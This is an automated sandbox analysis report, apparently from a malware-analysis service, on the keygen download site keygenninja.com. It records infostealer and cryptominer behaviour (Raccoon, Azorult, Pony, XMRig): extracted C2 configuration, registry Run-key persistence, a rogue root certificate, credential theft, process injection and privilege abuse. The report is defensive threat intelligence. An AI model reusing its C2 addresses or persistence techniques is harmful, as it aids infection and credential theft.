azorult | hxxps://keygenninja[.]com/

Resubmissions

01-04-2021 13:01

210401-rv1sa3x2hx 10

01-04-2021 05:31

210401-xss4g3z83s 10

31-03-2021 20:15

210331-ejt2g4wjex 10

Analysis

max time kernel
1785s
max time network
1786s
platform
windows10_x64
resource
win10v20201028
submitted
31-03-2021 20:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://keygenninja.com/
Sample

210331-ejt2g4wjex

Score

10^/10

azorult pony raccoon xmrig 4ce8ad65ffaa0dffa8cc56e03b4fd65c31c1a91d discovery evasion infostealer miner persistence rat spyware stealer trojan

Malware Config

Extracted

Family

raccoon

Botnet

4ce8ad65ffaa0dffa8cc56e03b4fd65c31c1a91d

Attributes

url4cnc
https://telete.in/j90dadarobin

rc4.plain

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral3/memory/3488-461-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/3488-463-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/3488-464-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/2168-588-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/2168-595-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/184-638-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/184-733-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/1816-872-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/1816-877-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

Processes:

msiexec.exemsiexec.exemsiexec.exemsiexec.exe

flow pid process

186 3488 msiexec.exe
303 2168 msiexec.exe
339 184 msiexec.exe
384 1816 msiexec.exe

flow	pid	process
186	3488	msiexec.exe
303	2168	msiexec.exe
339	184	msiexec.exe
384	1816	msiexec.exe

Executes dropped EXE 64 IoCs

Processes:

keygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exeaskinstall20.exe2F97.tmp.exefile.exe6E46.tmp.exe6F80.tmp.exe6E46.tmp.exemd2_2efs.exeBTRSetp.exe1531098.exe7769434.exe3414248.exe8868173.exegcttt.exejfiag3g_gg.exeWindows Host.exejfiag3g_gg.exe3414248.exekeygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekey.exekeygen-step-4.exeSetup.exekey.exe8FA6.tmp.exeaskinstall20.exefile.exekeygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exeD72E.tmp.exekey.exeD923.tmp.exeSetup.exekey.exeDFAA.tmp.exeaskinstall20.exeD72E.tmp.exemd2_2efs.exekeygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exefile.exekey.exeSetup.exe2A01.tmp.exeaskinstall20.exe2C44.tmp.exe304C.tmp.exe2C44.tmp.exemd2_2efs.exeBTRSetp.exe

pid	process
4520	keygen-pr.exe
4704	keygen-step-1.exe
4800	keygen-step-2.exe
200	keygen-step-3.exe
4416	keygen-step-4.exe
4216	key.exe
3512	Setup.exe
4176	askinstall20.exe
1580	2F97.tmp.exe
4516	file.exe
5060	6E46.tmp.exe
4256	6F80.tmp.exe
1836	6E46.tmp.exe
3784	md2_2efs.exe
5104	BTRSetp.exe
4156	1531098.exe
4436	7769434.exe
5052	3414248.exe
1972	8868173.exe
4132	gcttt.exe
1752	jfiag3g_gg.exe
640	Windows Host.exe
4916	jfiag3g_gg.exe
4476	3414248.exe
4260	keygen-pr.exe
476	keygen-step-1.exe
4568	keygen-step-2.exe
3884	keygen-step-3.exe
5056	key.exe
4796	keygen-step-4.exe
1452	Setup.exe
4500	key.exe
4328	8FA6.tmp.exe
1796	askinstall20.exe
1132	file.exe
2852	keygen-pr.exe
4136	keygen-step-1.exe
4692	keygen-step-2.exe
4788	keygen-step-3.exe
4264	keygen-step-4.exe
4452	D72E.tmp.exe
2396	key.exe
512	D923.tmp.exe
3140	Setup.exe
1144	key.exe
4620	DFAA.tmp.exe
4304	askinstall20.exe
824	D72E.tmp.exe
2152	md2_2efs.exe
2812	keygen-pr.exe
964	keygen-step-1.exe
4236	keygen-step-2.exe
4120	keygen-step-3.exe
4928	keygen-step-4.exe
2172	file.exe
4688	key.exe
2120	Setup.exe
1056	2A01.tmp.exe
3900	askinstall20.exe
896	2C44.tmp.exe
1272	304C.tmp.exe
412	2C44.tmp.exe
1088	md2_2efs.exe
4232	BTRSetp.exe

Loads dropped DLL 15 IoCs

Processes:

2F97.tmp.exe8FA6.tmp.exeDFAA.tmp.exe

pid	process
1580	2F97.tmp.exe
4328	8FA6.tmp.exe
4328	8FA6.tmp.exe
4328	8FA6.tmp.exe
4328	8FA6.tmp.exe
4328	8FA6.tmp.exe
4328	8FA6.tmp.exe
4328	8FA6.tmp.exe
4620	DFAA.tmp.exe
4620	DFAA.tmp.exe
4620	DFAA.tmp.exe
4620	DFAA.tmp.exe
4620	DFAA.tmp.exe
4620	DFAA.tmp.exe
4620	DFAA.tmp.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

6F80.tmp.exegcttt.exe304C.tmp.exeF750.tmp.exeD923.tmp.exe7769434.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe"	6F80.tmp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	304C.tmp.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	F750.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe"	F750.tmp.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	6F80.tmp.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	D923.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe"	D923.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe"	304C.tmp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	7769434.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

md2_2efs.exemd2_2efs.exemd2_2efs.exemd2_2efs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe

Drops Chrome extension 1 IoCs

Processes:

askinstall20.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall20.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

189 api.ipify.org
211 ip-api.com
300 api.ipify.org
331 api.ipify.org
382 api.ipify.org

flow	ioc
189	api.ipify.org
211	ip-api.com
300	api.ipify.org
331	api.ipify.org
382	api.ipify.org

Suspicious use of SetThreadContext 18 IoCs

Processes:

6F80.tmp.exe6E46.tmp.exe3414248.exekey.exekey.exeD923.tmp.exeD72E.tmp.exe2C44.tmp.exe304C.tmp.exe5560095.exeF750.tmp.exeF59A.tmp.exe8230264.exe2229989.exe

description	pid	process	target process
PID 4256 set thread context of 4828	4256	6F80.tmp.exe	msiexec.exe
PID 4256 set thread context of 3488	4256	6F80.tmp.exe	msiexec.exe
PID 5060 set thread context of 1836	5060	6E46.tmp.exe	6E46.tmp.exe
PID 5052 set thread context of 4476	5052	3414248.exe	3414248.exe
PID 5056 set thread context of 4500	5056	key.exe	key.exe
PID 2396 set thread context of 1144	2396	key.exe	key.exe
PID 512 set thread context of 4964	512	D923.tmp.exe	msiexec.exe
PID 512 set thread context of 2168	512	D923.tmp.exe	msiexec.exe
PID 4452 set thread context of 824	4452	D72E.tmp.exe	D72E.tmp.exe
PID 896 set thread context of 412	896	2C44.tmp.exe	2C44.tmp.exe
PID 1272 set thread context of 2188	1272	304C.tmp.exe	msiexec.exe
PID 1272 set thread context of 184	1272	304C.tmp.exe	msiexec.exe
PID 2192 set thread context of 3544	2192	5560095.exe	5560095.exe
PID 4624 set thread context of 584	4624	F750.tmp.exe	msiexec.exe
PID 2204 set thread context of 504	2204	F59A.tmp.exe	F59A.tmp.exe
PID 4624 set thread context of 1816	4624	F750.tmp.exe	msiexec.exe
PID 1820 set thread context of 4740	1820	8230264.exe	8230264.exe
PID 3528 set thread context of 4636	3528	2229989.exe	2229989.exe

Drops file in Program Files directory 1 IoCs

Processes:

chrmstp.exe

description ioc process

File opened for modification C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\debug.log chrmstp.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\debug.log	chrmstp.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

F59A.tmp.exe6E46.tmp.exeD72E.tmp.exe2C44.tmp.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	F59A.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	6E46.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	6E46.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	D72E.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	D72E.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	2C44.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	2C44.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	F59A.tmp.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

1340 timeout.exe
4268 timeout.exe
4028 timeout.exe

pid	process
1340	timeout.exe
4268	timeout.exe
4028	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4644 taskkill.exe
4852 taskkill.exe
4608 taskkill.exe
2288 taskkill.exe

pid	process
4644	taskkill.exe
4852	taskkill.exe
4608	taskkill.exe
2288	taskkill.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

file.exefile.exefile.exefile.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe

Modifies registry class 2 IoCs

Processes:

chrome.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	OpenWith.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

keygen-step-2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe

Runs ping.exe 1 TTPs 12 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
1844	PING.EXE
1864	PING.EXE
1360	PING.EXE
4252	PING.EXE
1988	PING.EXE
1944	PING.EXE
1532	PING.EXE
1268	PING.EXE
208	PING.EXE
2920	PING.EXE
4816	PING.EXE
4616	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exefile.exe6E46.tmp.exejfiag3g_gg.exe8868173.exe1531098.exe3414248.exekey.exechrome.exechrome.exefile.exeD72E.tmp.exekey.exefile.exe

pid	process
3924	chrome.exe
3924	chrome.exe
3248	chrome.exe
3248	chrome.exe
5056	chrome.exe
5056	chrome.exe
4728	chrome.exe
4728	chrome.exe
2196	chrome.exe
2196	chrome.exe
4824	chrome.exe
4824	chrome.exe
4292	chrome.exe
4292	chrome.exe
4924	chrome.exe
4924	chrome.exe
4436	chrome.exe
4436	chrome.exe
4680	chrome.exe
4680	chrome.exe
4948	chrome.exe
4948	chrome.exe
4128	chrome.exe
4128	chrome.exe
4516	file.exe
4516	file.exe
4516	file.exe
4516	file.exe
4516	file.exe
4516	file.exe
4516	file.exe
4516	file.exe
1836	6E46.tmp.exe
1836	6E46.tmp.exe
4916	jfiag3g_gg.exe
4916	jfiag3g_gg.exe
1972	8868173.exe
1972	8868173.exe
4156	1531098.exe
4156	1531098.exe
4156	1531098.exe
4476	3414248.exe
5056	key.exe
5056	key.exe
4084	chrome.exe
4084	chrome.exe
1180	chrome.exe
1180	chrome.exe
1132	file.exe
1132	file.exe
1132	file.exe
1132	file.exe
1132	file.exe
1132	file.exe
1132	file.exe
1132	file.exe
824	D72E.tmp.exe
824	D72E.tmp.exe
2396	key.exe
2396	key.exe
2172	file.exe
2172	file.exe
2172	file.exe
2172	file.exe

Suspicious behavior: SetClipboardViewer 3 IoCs

Processes:

4431655.exe2619175.exe4829489.exe

pid process

4972 4431655.exe
3160 2619175.exe
4736 4829489.exe

pid	process
4972	4431655.exe
3160	2619175.exe
4736	4829489.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Setup.exeaskinstall20.exetaskkill.exemsiexec.exefile.exemd2_2efs.exeBTRSetp.exe3414248.exe8868173.exe1531098.exe3414248.exeSetup.exeaskinstall20.exe

description	pid	process
Token: SeDebugPrivilege	3512	Setup.exe
Token: SeCreateTokenPrivilege	4176	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	4176	askinstall20.exe
Token: SeLockMemoryPrivilege	4176	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	4176	askinstall20.exe
Token: SeMachineAccountPrivilege	4176	askinstall20.exe
Token: SeTcbPrivilege	4176	askinstall20.exe
Token: SeSecurityPrivilege	4176	askinstall20.exe
Token: SeTakeOwnershipPrivilege	4176	askinstall20.exe
Token: SeLoadDriverPrivilege	4176	askinstall20.exe
Token: SeSystemProfilePrivilege	4176	askinstall20.exe
Token: SeSystemtimePrivilege	4176	askinstall20.exe
Token: SeProfSingleProcessPrivilege	4176	askinstall20.exe
Token: SeIncBasePriorityPrivilege	4176	askinstall20.exe
Token: SeCreatePagefilePrivilege	4176	askinstall20.exe
Token: SeCreatePermanentPrivilege	4176	askinstall20.exe
Token: SeBackupPrivilege	4176	askinstall20.exe
Token: SeRestorePrivilege	4176	askinstall20.exe
Token: SeShutdownPrivilege	4176	askinstall20.exe
Token: SeDebugPrivilege	4176	askinstall20.exe
Token: SeAuditPrivilege	4176	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	4176	askinstall20.exe
Token: SeChangeNotifyPrivilege	4176	askinstall20.exe
Token: SeRemoteShutdownPrivilege	4176	askinstall20.exe
Token: SeUndockPrivilege	4176	askinstall20.exe
Token: SeSyncAgentPrivilege	4176	askinstall20.exe
Token: SeEnableDelegationPrivilege	4176	askinstall20.exe
Token: SeManageVolumePrivilege	4176	askinstall20.exe
Token: SeImpersonatePrivilege	4176	askinstall20.exe
Token: SeCreateGlobalPrivilege	4176	askinstall20.exe
Token: 31	4176	askinstall20.exe
Token: 32	4176	askinstall20.exe
Token: 33	4176	askinstall20.exe
Token: 34	4176	askinstall20.exe
Token: 35	4176	askinstall20.exe
Token: SeDebugPrivilege	4644	taskkill.exe
Token: SeLockMemoryPrivilege	3488	msiexec.exe
Token: SeLockMemoryPrivilege	3488	msiexec.exe
Token: SeDebugPrivilege	4516	file.exe
Token: SeManageVolumePrivilege	3784	md2_2efs.exe
Token: SeManageVolumePrivilege	3784	md2_2efs.exe
Token: SeManageVolumePrivilege	3784	md2_2efs.exe
Token: SeDebugPrivilege	5104	BTRSetp.exe
Token: SeDebugPrivilege	5052	3414248.exe
Token: SeDebugPrivilege	1972	8868173.exe
Token: SeDebugPrivilege	4156	1531098.exe
Token: SeDebugPrivilege	4476	3414248.exe
Token: SeDebugPrivilege	1452	Setup.exe
Token: SeCreateTokenPrivilege	1796	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	1796	askinstall20.exe
Token: SeLockMemoryPrivilege	1796	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	1796	askinstall20.exe
Token: SeMachineAccountPrivilege	1796	askinstall20.exe
Token: SeTcbPrivilege	1796	askinstall20.exe
Token: SeSecurityPrivilege	1796	askinstall20.exe
Token: SeTakeOwnershipPrivilege	1796	askinstall20.exe
Token: SeLoadDriverPrivilege	1796	askinstall20.exe
Token: SeSystemProfilePrivilege	1796	askinstall20.exe
Token: SeSystemtimePrivilege	1796	askinstall20.exe
Token: SeProfSingleProcessPrivilege	1796	askinstall20.exe
Token: SeIncBasePriorityPrivilege	1796	askinstall20.exe
Token: SeCreatePagefilePrivilege	1796	askinstall20.exe
Token: SeCreatePermanentPrivilege	1796	askinstall20.exe
Token: SeBackupPrivilege	1796	askinstall20.exe

Suspicious use of FindShellTrayWindow 17 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exe

pid	process
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
3248	chrome.exe
4128	chrome.exe
4128	chrome.exe
1180	chrome.exe
1180	chrome.exe
3224	chrome.exe

Suspicious use of SetWindowsHookEx 9 IoCs

Processes:

OpenWith.exe

pid	process
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe
4748	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3248 wrote to memory of 476	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 476	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3956	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3924	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 3924	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
PID 3248 wrote to memory of 784	3248	chrome.exe	chrome.exe
